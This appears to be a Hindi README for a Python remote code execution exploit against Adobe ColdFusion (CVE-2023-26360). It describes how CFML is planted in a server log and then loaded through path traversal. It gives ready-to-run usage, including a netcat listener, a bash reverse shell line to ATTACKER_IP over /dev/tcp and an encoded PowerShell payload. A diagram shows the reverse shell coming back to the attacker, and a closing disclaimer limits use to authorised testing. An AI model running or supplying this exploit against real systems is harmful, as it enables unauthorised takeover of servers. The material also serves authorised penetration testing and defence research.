
यह एक्सप्लॉइट CVE-2023-26360 (https://nvd.nist.gov/vuln/detail/CVE-2023-26360) पर आधारित है और इसे Metasploit मॉड्यूल तथा jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit के आधार पर निर्मित किया गया है।
CVE-2023-26360 के लिए दूरस्थ कोड निष्पादन शोषण का Python कार्यान्वयन, मूल Metasploit module के विश्लेषण और jakabakos के पूर्व कार्य पर आधारित।
jakabakos का PoC <cfexecute> को सीधे _variables पैरामीटर में इंजेक्ट करने और एक ही चरण में ColdFusion लॉग से आउटपुट पढ़ने का प्रयास करता है। यह दृष्टिकोण विफल हो जाता है क्योंकि ColdFusion उस संदर्भ में CFML टैग का इनलाइन मूल्यांकन नहीं करता है, जिसके परिणामस्वरूप बिना कोड निष्पादन के 500 त्रुटि होती है।
यह कार्यान्वयन Metasploit मॉड्यूल द्वारा उपयोग किए गए सही दो-चरणीय तंत्र को दोहराता है:
_variables पेलोड ({<cftry>CFML</cftry>) भेजता है। ColdFusion इसे पार्स करने में विफल रहता है और कच्ची सामग्री — जिसमें CFML कोड भी शामिल है — को coldfusion-out.log में लिखता है।कमांड निष्पादन createObject के माध्यम से java.lang.Runtime.exec() के द्वारा किया जाता है, जो <cfexecute> पर किसी भी निर्भरता से बचाता है, जो आमतौर पर सख्त या उत्पादन परिनियोजन में अक्षम होता है।
pip install -r requirements.txt
शोषण चलाने से पहले एक लिसनर प्रारंभ करें:
nc -lvnp 4444
Windows लक्ष्य:
python exploit.py --host http://TARGET:8500 --win --cmd "powershell -e <BASE64_PAYLOAD>"
Linux लक्ष्य:
python exploit.py --host http://TARGET:8500 --cmd "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
प्रॉक्सी के माध्यम से (जैसे Burp Suite):
python exploit.py --host http://TARGET:8500 --win --cmd "whoami" --proxy http://127.0.0.1:8080
| फ़्लैग | विवरण |
|---|---|
--host |
┌─────────────┐ Step 1: plant CFML ┌──────────────────┐
│ Attacker │ ──── POST /_variables={<cftry>... ──► iedit.cfc │
│ │ CF fails to parse, logs CFML │ │
│ │ │ coldfusion- │
│ │ Step 2: trigger execution │ out.log │
│ │ ──── POST classname=X..\logs\cf... ──► (loaded as │
│ │ │ CFML template) │
│ Listener │ ◄─────────────── reverse shell ───────│ │
└─────────────┘ └──────────────────┘
यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा मूल्यांकन (पेनिट्रेशन टेस्ट, CTF, प्रयोगशाला वातावरण) के लिए प्रदान किया जाता है। स्पष्ट लिखित अनुमति के बिना सिस्टम के विरुद्ध इस शोषण को चलाना अवैध है। लेखक किसी भी दुरुपयोग के लिए कोई देयता नहीं लेता है।
लक्ष्य आधार URL (जैसे http://192.168.1.10:8500) |
--cmd | लक्ष्य पर निष्पादित करने का आदेश |
--win | यदि लक्ष्य Windows होस्ट है तो यह फ़्लैग सेट करें |
--proxy | वैकल्पिक HTTP प्रॉक्सी URL |